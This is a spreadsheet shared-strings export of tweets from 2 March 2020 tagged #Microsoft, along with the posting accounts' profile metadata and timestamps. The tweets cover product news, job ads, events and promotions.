    <t>{'id': 271145810, 'id_str': '271145810', 'name': 'Durgesh Khandal', 'screen_name': 'iduggu', 'location': 'Bengaluru, India', 'description': 'Learn | Laugh | Code | Travel |\nXamarin Certified Mobile Developer &amp; Sitecore Certified Web developer', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 45, 'friends_count': 195, 'listed_count': 1, 'created_at': 'Wed Mar 23 23:20:08 +0000 2011', 'favourites_count': 453, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 206,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'http://pbs.twimg.com/profile_images/1117483612188725248/Wan2g9Ux_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1117483612188725248/Wan2g9Ux_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/271145810/1555263696', 'profile_link_color': '24292E',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</si>
  <si>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08:01:03 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Surface Shock As New Surface Go 2 Revealed https://t.co/U58e15dRdH Story via @ewanspence #microsoft</t>
  </si>
  <si>
    <t>{'id': 28920064, 'id_str': '28920064', 'name': 'Mark Reynolds IT', 'screen_name': 'MarkReynoldsIT', 'location': 'Adelaide, South Australia', 'description': 'IT Professional | Web Developer | Social Media | SEO | Writer | Providing professional IT advice &amp; support to businesses in Adelaide, South Australia', 'url': 'https://t.co/THB1zBLyGu', 'entities': {'url': {'urls': [{'url': 'https://t.co/THB1zBLyGu', 'expanded_url': 'http://www.markreynolds.com.au', 'display_url': 'markreynolds.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1280, 'friends_count': 1920, 'listed_count': 331, 'created_at': 'Sun Apr 05 02:12:39 +0000 2009', 'favourites_count': 232, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 45459,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'http://pbs.twimg.com/profile_images/1495260019/Mark-Reynolds-IT-Consulting-Logo_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1495260019/Mark-Reynolds-IT-Consulting-Logo_normal.png',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</si>
  <si>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08:00:27 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft, #IBM may have to tweak #AI to drop gender labels, following #Google's example #appsmgt https://t.co/dFGzPbi7vA https://t.co/8PsgUgPNP4</t>
  </si>
  <si>
    <t>Our client has an international and innovative environment, which is creating a lot of opportunities for people with an entrepreneurial spirit who want to make a difference in this world.
https://t.co/MeqqOnr9Tp
#CloudArchitect #Microsoft #Azure #Cloud #Goteborg #Sweden https://t.co/WUgFeag1er</t>
  </si>
  <si>
    <t>{'id': 1904732449, 'id_str': '1904732449', 'name': 'StaffHost Europe', 'screen_name': 'StaffHost', 'location': 'UK / EUROPE', 'description': 'Connecting Niche Technology Professionals across Europe. #ServiceNow | #Salesforce | #CyberSecurity | #Cloud #O365 #Azure #GCP | #Recruitment #Beaconsfield', 'url': 'https://t.co/CdaMoI2NYy', 'entities': {'url': {'urls': [{'url': 'https://t.co/CdaMoI2NYy', 'expanded_url': 'http://www.StaffHostEurope.com', 'display_url': 'StaffHostEurope.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 415, 'friends_count': 86, 'listed_count': 15, 'created_at': 'Wed Sep 25 16:14:11 +0000 2013', 'favourites_count': 857, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1353, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '3C286F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/981844309203996672/C-sWskBJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/981844309203996672/C-sWskBJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1904732449/1565713148', 'profile_link_color': '3D276C',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</si>
  <si>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Mon Mar 02 08:00:23 +0000 2020</t>
  </si>
  <si>
    <t>So I definitely came back from Azure Engineering Bootcamp almost 2kg heavier - damn those delicious scones that appeared 2x a day in Dublin.
I gained so much weight since starting at #microsoft  now gotta get back into #geekfit https://t.co/4cWdUcJ7kT</t>
  </si>
  <si>
    <t>{'id': 139345833, 'id_str': '139345833', 'name': 'Julie Ng', 'screen_name': 'jng5', 'location': 'Munich, Germany', 'description': 'ðŸ‘©\u200dðŸ’»Engineer, FastTrack for @Azure, @Microsoft. Co-founder @refreshmunich and co-organizer @uxmunich. Thoughts are my own.', 'url': 'https://t.co/BakyDgGKqA', 'entities': {'url': {'urls': [{'url': 'https://t.co/BakyDgGKqA', 'expanded_url': 'https://julie.io', 'display_url': 'julie.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1494, 'friends_count': 312, 'listed_count': 97, 'created_at': 'Sun May 02 09:26:42 +0000 2010', 'favourites_count': 1279, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6724,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True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1152190472447778816/BEsAgVjh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1152190472447778816/BEsAgVjh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/139345833/1576320642', 'profile_link_color': '3B94D9', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 07:58:18 +0000 2020</t>
  </si>
  <si>
    <t>It was wonderful to get to hear up, close and personal from the industry icons last week ! #Infosys #Microsoft https://t.co/MHoxwysvg2</t>
  </si>
  <si>
    <t>{'id': 114119187, 'id_str': '114119187', 'name': 'Tarang Puranik', 'screen_name': 'tarangpuranik22', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 45, 'friends_count': 57, 'listed_count': 0, 'created_at': 'Sun Feb 14 06:01:54 +0000 2010', 'favourites_count': 456, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/2923814807/23a7f72282f011f4313ac26af1fc36dd_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2923814807/23a7f72282f011f4313ac26af1fc36dd_normal.jpeg',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</si>
  <si>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07:50:21 +0000 2020</t>
  </si>
  <si>
    <t>Update #KB4535996 from #Microsoft looks to fix two problems with #Windows. It tackles issues users are having with #printing and #WindowsSearch. https://t.co/WTvyEASxWn</t>
  </si>
  <si>
    <t>{'id': 992366621074259968, 'id_str': '992366621074259968', 'name': 'i90', 'screen_name': 'i90cloud', 'location': 'Durham, England', 'description': 'Managed IT &amp; Cloud Services', 'url': 'https://t.co/XdG4WIDMcu', 'entities': {'url': {'urls': [{'url': 'https://t.co/XdG4WIDMcu', 'expanded_url': 'http://i90.uk', 'display_url': 'i90.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11, 'friends_count': 27, 'listed_count': 1, 'created_at': 'Fri May 04 11:33:34 +0000 2018', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1197161984531283968/Zwp9tDzX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1197161984531283968/Zwp9tDzX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/992366621074259968/1552676433',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</si>
  <si>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07:47:42 +0000 2020</t>
  </si>
  <si>
    <t>Cortana in the upcoming Windows 10 release: focused on your productivity with enhanced security and privacy https://t.co/Jz6dIh1Mjn #cortana #microsoft #voicetech</t>
  </si>
  <si>
    <t>Mon Mar 02 07:46:43 +0000 2020</t>
  </si>
  <si>
    <t>Why #Azure Sphere From #Microsoft Is A Big Deal For The #IoT Ecosystem by @Forbes 
@Azure @Microsoft @DougonIPComm  https://t.co/x0YzTdyqSI</t>
  </si>
  <si>
    <t>{'id': 20163762, 'id_str': '20163762', 'name': 'Irma Rastegayevaâœ¨#HIMSS20', 'screen_name': 'IrmaRaste', 'location': 'Health+Tech in Boston, MA', 'description': '#HealthTech #DigitalHealth| Top Women in #Tech #influencer| #B2B #marketing #storytellingðŸ¦„| #PtExp #pinksocks #TED| @eViRaHealth @TEDxBeaconSt| b4 @Google @IBM', 'url': 'https://t.co/MqgcE74HOb', 'entities': {'url': {'urls': [{'url': 'https://t.co/MqgcE74HOb', 'expanded_url': 'http://linkedin.com/in/irmaraste', 'display_url': 'linkedin.com/in/irmaraste', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 12952, 'friends_count': 11730, 'listed_count': 795, 'created_at': 'Thu Feb 05 16:55:03 +0000 2009', 'favourites_count': 37566, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 52866,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'http://pbs.twimg.com/profile_images/674283817448792064/NteFE4XD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/674283817448792064/NteFE4XD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20163762/1504640777',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</si>
  <si>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07:44:26 +0000 2020</t>
  </si>
  <si>
    <t>"Conker Goes Berry Picking" by SpongicX https://t.co/GYL6JRsgAS
Random, I know.
#Conker #squirrel #Berri #chipmunk #Rareware #Nintendo #N64 #Microsoft #FanArt #funny</t>
  </si>
  <si>
    <t>Mon Mar 02 07:44:15 +0000 2020</t>
  </si>
  <si>
    <t>Beautifully Designed Presentation Template 
 https://t.co/FvZdOLUY6l
It's Elements! Easy to Edit &amp;amp; Create!
#powerpoint #element #elements #sunday #SundayMotivation #SundayThoughts #SundayService #SundayMorning #sundaymood #SundayFunday #slide #design #ppt #Microsoft https://t.co/sa2u5Qusnu</t>
  </si>
  <si>
    <t>{'id': 871257338, 'id_str': '871257338', 'name': 'SlideDesigning.com | Presentation Templates ðŸ“ðŸš€ðŸ“Š', 'screen_name': 'PowerpointPpt', 'location': 'World', 'description': 'Create a beautiful design Today! You can build any presentation with ðŸš€ World-Class Templates\n\nEffective | Impressive | Beautiful\nDonâ€™t wait more, Letâ€™s Start!', 'url': 'https://t.co/WgVDBGFoMX', 'entities': {'url': {'urls': [{'url': 'https://t.co/WgVDBGFoMX', 'expanded_url': 'http://bit.ly/2DIu8e6', 'display_url': 'bit.ly/2DIu8e6', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3795, 'friends_count': 3707, 'listed_count': 46, 'created_at': 'Wed Oct 10 06:44:39 +0000 2012', 'favourites_count': 38526, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2229,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'http://pbs.twimg.com/profile_images/1235833468824637442/sZbmYm3B_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235833468824637442/sZbmYm3B_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/871257338/1582390453',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</si>
  <si>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07:43:23 +0000 2020</t>
  </si>
  <si>
    <t>the reason why i've been single my all life? it's just that i am even scared to put commits on gitlab
#gitlab #github #Microsoft #amazon #developers</t>
  </si>
  <si>
    <t>{'id': 3713915120, 'id_str': '3713915120', 'name': 'vedant', 'screen_name': 'vedant911', 'location': '', 'description': 'instagram: vedant911', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 31, 'friends_count': 148, 'listed_count': 0, 'created_at': 'Mon Sep 28 10:54:15 +0000 2015', 'favourites_count': 38, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1168227229521928193/m9ohHNtY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1168227229521928193/m9ohHNtY_normal.jpg',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</si>
  <si>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07:42:10 +0000 2020</t>
  </si>
  <si>
    <t>The first ever mention of "#Microsoft" was in a letter from Bill Gates to co-founder Paul Allen in 1975. Gates initially wrote the company name as Micro-soft.
#BillGates #PaulAllen #windows #like4like #technology #didyouknow #DYK #facts #trivia #mondaythoughts https://t.co/WSi1ob1ZGq</t>
  </si>
  <si>
    <t>{'id': 1006847226860015617, 'id_str': '1006847226860015617', 'name': 'InvoIdea Technologies', 'screen_name': 'InvoideaTech', 'location': 'New Delhi, India', 'description': 'Invoidea Technologies Pvt. Ltd. is #Digital Service Provider  offering D-M-C (#DesignðŸŽ¨-#MarketingðŸ“¯-#CodingðŸ’») services to Global #Businesses.', 'url': 'https://t.co/0FkwRLcTIo', 'entities': {'url': {'urls': [{'url': 'https://t.co/0FkwRLcTIo', 'expanded_url': 'http://www.invoidea.com', 'display_url': 'invoidea.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 111, 'friends_count': 97, 'listed_count': 0, 'created_at': 'Wed Jun 13 10:34:19 +0000 2018', 'favourites_count': 567, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 311,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'http://pbs.twimg.com/profile_images/1024641598553030663/-L52mxfD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1024641598553030663/-L52mxfD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1006847226860015617/1533213395', 'profile_link_color': 'F89520',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</si>
  <si>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07:39:02 +0000 2020</t>
  </si>
  <si>
    <t>Because of Sabio, Lyrna got accepted into #Microsoft's prestigious #LEAP program. Now she gets paid to advance her #career. You can too! 
https://t.co/CP5ggbqhgu
#WomenInTech #100DaysOfCode #CodeNewbie #LearnToCode #Coding #Programming #Tech #Technology #Coder #WebDesign https://t.co/mJOHKQ5q0X</t>
  </si>
  <si>
    <t>Mon Mar 02 07:38:05 +0000 2020</t>
  </si>
  <si>
    <t>Get the straightforward solution to restore your @Outlook working by using ZOOK OST to PST Converter. It helps you to move your Outlook data from old to new Outlook.
#OSTtoPSTConverter #OSTtoPST #ConvertOSTtoPST #Microsoft #TransferOSTFile
For More Info: - https://t.co/A2ggGi0H3J https://t.co/GfFrVNGdMu</t>
  </si>
  <si>
    <t>{'id': 745962901639356418, 'id_str': '745962901639356418', 'name': 'ZOOK Software', 'screen_name': 'ZOOKSoftware', 'location': 'India', 'description': '#ZOOKSoftware assist to #EmailConversion,migration from one format to other,recovery of data efficiently from various sources in seconds https://t.co/EMkJJgNNNc', 'url': 'https://t.co/KjYkmWtY07', 'entities': {'url': {'urls': [{'url': 'https://t.co/KjYkmWtY07', 'expanded_url': 'http://www.zooksoftware.com/', 'display_url': 'zooksoftware.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/EMkJJgNNNc', 'expanded_url': 'http://bit.ly/29VbVLq', 'display_url': 'bit.ly/29VbVLq', 'indices': [137, 160]}]}}, 'protected': False, 'followers_count': 89, 'friends_count': 42, 'listed_count': 0, 'created_at': 'Thu Jun 23 12:53:09 +0000 2016', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 188,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'http://pbs.twimg.com/profile_images/1153925242034647041/goLYYYPV_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1153925242034647041/goLYYYPV_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/745962901639356418/1563953665',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</si>
  <si>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07:35:07 +0000 2020</t>
  </si>
  <si>
    <t>The Vancouver SharePoint Saturday event is less than 1 month away. Have you secured your spot? (Use the QR code to join)
#SPSVancouver #SPS_Events #MicrosoftTeams #Microsoft #sharepointonline #Microsoft365 #Office365 #SPSEvent #spscommunity https://t.co/9lNIPG27mj</t>
  </si>
  <si>
    <t>{'id': 417492918, 'id_str': '417492918', 'name': 'Tom Ng', 'screen_name': 'tom_ng_canada', 'location': 'Vancouver, BC', 'description': 'O365 &amp; SharePoint Practitioner, Board President of @Van_O365 User Group, Traveller, Snowboarder', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 162, 'friends_count': 281, 'listed_count': 4, 'created_at': 'Mon Nov 21 00:52:52 +0000 2011', 'favourites_count': 930, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/931952751918981120/FHBm6fI5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/931952751918981120/FHBm6fI5_normal.jpg',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</si>
  <si>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07:33:04 +0000 2020</t>
  </si>
  <si>
    <t>We have hundreds of new #document #templates available at https://t.co/046Lp3cgMS #register for #free and get #access to start #downloading today
#microsoft #sales #business #spreadsheet #excel #word #PowerPoint #smallbusiness #report #picture #trending #follow #cool #template https://t.co/cjehAI6fI7</t>
  </si>
  <si>
    <t>Mon Mar 02 07:31:12 +0000 2020</t>
  </si>
  <si>
    <t>By 2:00pm we were back @vilangeliahotel to begin the next phase of the summit. Before that, we had lunch and were set to begin.
We had @Deji_Folarin MCT and @soluwawumiju MVP talk about "Technology in Africa and how to make a change."
#MSPSummitNigeria #Microsoft @MSPInspire</t>
  </si>
  <si>
    <t>{'id': 1205945209567268866, 'id_str': '1205945209567268866', 'name': 'Microsoft Student Partners Nigeria', 'screen_name': 'mspsinnigeria', 'location': '', 'description': 'Microsoft Student Partners are on-campus leaders with a passion for making a difference, building vibrant communities, and sharing the latest tech with others.', 'url': 'https://t.co/PPebaPHn5G', 'entities': {'url': {'urls': [{'url': 'https://t.co/PPebaPHn5G', 'expanded_url': 'http://studentpartners.microsoft.com', 'display_url': 'studentpartners.microsoft.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 213, 'friends_count': 32, 'listed_count': 0, 'created_at': 'Sat Dec 14 20:19:34 +0000 2019', 'favourites_count': 290,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'http://pbs.twimg.com/profile_images/1205946132150530048/rl6K-dmT_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1205946132150530048/rl6K-dmT_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1205945209567268866/1576357057',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</si>
  <si>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07:30:02 +0000 2020</t>
  </si>
  <si>
    <t>Deze week als Business Deal: Microsoft Surface Pro 7. https://t.co/kMQaE6804d #weekaanbieding #actie #Microsoft #SurfacePro7 https://t.co/cqdfXCjN0G</t>
  </si>
  <si>
    <t>{'id': 64970989, 'id_str': '64970989', 'name': 'Centralpoint Nederland', 'screen_name': 'centralpoint_nl', 'location': 'Nederland', 'description': 'De nieuwe naam van https://t.co/zxNSJuymPH , Infotheek en Scholten Awater.  Centralpoint is de grootste IT-reseller van de Benelux voor de zakelijke markt!', 'url': 'https://t.co/l8dRIuaauv', 'entities': {'url': {'urls': [{'url': 'https://t.co/l8dRIuaauv', 'expanded_url': 'https://www.centralpoint.nl/', 'display_url': 'centralpoint.nl', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/zxNSJuymPH', 'expanded_url': 'http://Centralpoint.nl', 'display_url': 'Centralpoint.nl', 'indices': [19, 42]}]}}, 'protected': False, 'followers_count': 8249, 'friends_count': 2861, 'listed_count': 152, 'created_at': 'Wed Aug 12 07:28:44 +0000 2009', 'favourites_count': 848, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 20295, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EC732C', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1003537318286954497/1cWSBp8h_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1003537318286954497/1cWSBp8h_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/64970989/1528096929', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'F3F4F7', 'profile_text_color': '161A5C', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 07:27:56 +0000 2020</t>
  </si>
  <si>
    <t>Phil Spencer says streaming will boost creativity
#PhilSpencer #Microsoft #Xbox #Gaming https://t.co/BkMDaiWEZ1</t>
  </si>
  <si>
    <t>{'id': 926109472199790598, 'id_str': '926109472199790598', 'name': 'Bang Gaming', 'screen_name': 'BangGaming1', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 74, 'friends_count': 345, 'listed_count': 3, 'created_at': 'Thu Nov 02 15:31:19 +0000 2017', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 567, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/952864898018697216/W81Kku9A_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/952864898018697216/W81Kku9A_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/926109472199790598/1516015574',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</si>
  <si>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07:18:11 +0000 2020</t>
  </si>
  <si>
    <t>We had a great IAMCP Ahmedabad Chapter meeting with a fantastic knowledge session on Microsoft 365 - Security and Compliance by Nilesh Yawalkar.
Nilesh explained how partners can build their competency around Security and Compliance.
#iamcpindia #iamcp #mspartner #microsoft https://t.co/frSl7fwQDb</t>
  </si>
  <si>
    <t>{'id': 942703730780073984, 'id_str': '942703730780073984', 'name': 'IAMCP INDIA', 'screen_name': 'IamcpIndia', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 94, 'friends_count': 27, 'listed_count': 2, 'created_at': 'Mon Dec 18 10:30:58 +0000 2017', 'favourites_count': 86, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 134, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/983898055299747842/jMxbgQ7-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/983898055299747842/jMxbgQ7-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/942703730780073984/1514294669',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</si>
  <si>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07:17:41 +0000 2020</t>
  </si>
  <si>
    <t>.@Azure  The #Microsoft #CloudAdoptionFramework for #Azure is proven guidance thats designed to help you create and implement the business and technology strategies necessary for your organization to succeed in the #cloud.
https://t.co/5fiPeGNz2p</t>
  </si>
  <si>
    <t>{'id': 2991433396, 'id_str': '2991433396', 'name': 'Amol Kulkarni', 'screen_name': 'amol_kulk', 'location': 'Pune', 'description': 'Senior Technical Architect @ Persistent Systems Ltd. Microsoft Certified : Azure Solutions Architect Expert. Tweets are personal', 'url': 'https://t.co/C2L50lPb5d', 'entities': {'url': {'urls': [{'url': 'https://t.co/C2L50lPb5d', 'expanded_url': 'http://in.linkedin.com/in/amolskulkarni', 'display_url': 'in.linkedin.com/in/amolskulkarâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 712, 'friends_count': 164, 'listed_count': 96, 'created_at': 'Thu Jan 22 04:27:39 +0000 2015', 'favourites_count': 2150, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2421,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'http://pbs.twimg.com/profile_images/1077845333034627073/i1ei54JC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1077845333034627073/i1ei54JC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2991433396/1493264047',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</si>
  <si>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07:16:23 +0000 2020</t>
  </si>
  <si>
    <t>Go through an intense action story as Joanna and take out enemies in Perfect Dark Zero https://t.co/FsRerqYa3O #microsoft #xbox #xbox360 #gaming #darkness https://t.co/HTvOLi276L</t>
  </si>
  <si>
    <t>Mon Mar 02 07:14:52 +0000 2020</t>
  </si>
  <si>
    <t>Some rough sex and no thinking would be nice right now #Henderson   #microsoft #car https://t.co/NNehG9RGzz</t>
  </si>
  <si>
    <t>{'id': 1234119346152181762, 'id_str': '1234119346152181762', 'name': 'Local Moring', 'screen_name': 'masoomecma', 'location': 'Kansas City, USA', 'description': 'When I saw you I fell in love, and you smiled because you knew.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 34, 'listed_count': 0, 'created_at': 'Sun Mar 01 14:12:41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'http://pbs.twimg.com/profile_images/1234124330180718600/L_TeMf7p_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234124330180718600/L_TeMf7p_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234119346152181762/1583073183',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</si>
  <si>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07:04:19 +0000 2020</t>
  </si>
  <si>
    <t>@Office365 #Microsoft greatest company.. Is refunded my money when I delete 1 package from my business account.. Thanxxx #BillGates..  https://t.co/nlnvfGZdrg</t>
  </si>
  <si>
    <t>{'id': 1102692692809736193, 'id_str': '1102692692809736193', 'name': 'spokemind', 'screen_name': 'spokemind', 'location': '', 'description': '#spokemind Foundation For #AI #IT', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 142, 'listed_count': 0, 'created_at': 'Mon Mar 04 22:09:59 +0000 2019', 'favourites_count': 152,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'http://pbs.twimg.com/profile_images/1173698795982512128/8auqKlwu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1173698795982512128/8auqKlwu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1102692692809736193/1568666611',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</si>
  <si>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07:01:23 +0000 2020</t>
  </si>
  <si>
    <t>Waitress in Japan becomes self-taught developer in #Microsoft #PowerBI and #Azure to digitally transform her restaurant--now her applications are being adopted by others in the food service industry. Watch her incredible story. Get in touch with #Azuro https://t.co/id0i3UL11x</t>
  </si>
  <si>
    <t>Mon Mar 02 07:00:38 +0000 2020</t>
  </si>
  <si>
    <t>#Mondaymotivation
To Improve your business productivity;
Visit: https://t.co/20frb29xji
Or
Call: 0700ANALYTICS / 01-6311885 for more information
.
#urbizedge #mondaythoughts #monday #excel #microsoftexceltraining #microsoft #powerbi #financialmodeling #March https://t.co/NeDcxyiELd</t>
  </si>
  <si>
    <t>{'id': 914750738, 'id_str': '914750738', 'name': 'Nigeria NewspapersðŸ”µ', 'screen_name': 'NigeriaDaiily', 'location': 'Nigeria', 'description': "Breaking News live from Nigeria's Vanguard, ThisDay, Punch and Nation newspapers. Get a free gift, an investment guide for Nigerians, click the link below!", 'url': 'http://t.co/qdwi8bwhzI', 'entities': {'url': {'urls': [{'url': 'http://t.co/qdwi8bwhzI', 'expanded_url': 'http://eepurl.com/F0EwH', 'display_url': 'eepurl.com/F0EwH', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 107199, 'friends_count': 89273, 'listed_count': 292, 'created_at': 'Tue Oct 30 14:21:32 +0000 2012', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 404262, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FCEBB6', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/2926474037/d5ae0683fe8fef18e67b7737d9aa4c5e_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2926474037/d5ae0683fe8fef18e67b7737d9aa4c5e_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/914750738/1360660306', 'profile_link_color': 'CE7834', 'profile_sidebar_border_color': 'F0A830', 'profile_sidebar_fill_color': '78C0A8', 'profile_text_color': '5E412F', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>#Mondaymotivation
To Improve your business productivity;
Visit: https://t.co/gBZGu7FQ49
Or
Call: 0700ANALYTICS / 01-6311885 for more information
.
#urbizedge #mondaythoughts #monday #excel #microsoftexceltraining #microsoft #powerbi #financialmodeling #March https://t.co/SE2icAYZrg</t>
  </si>
  <si>
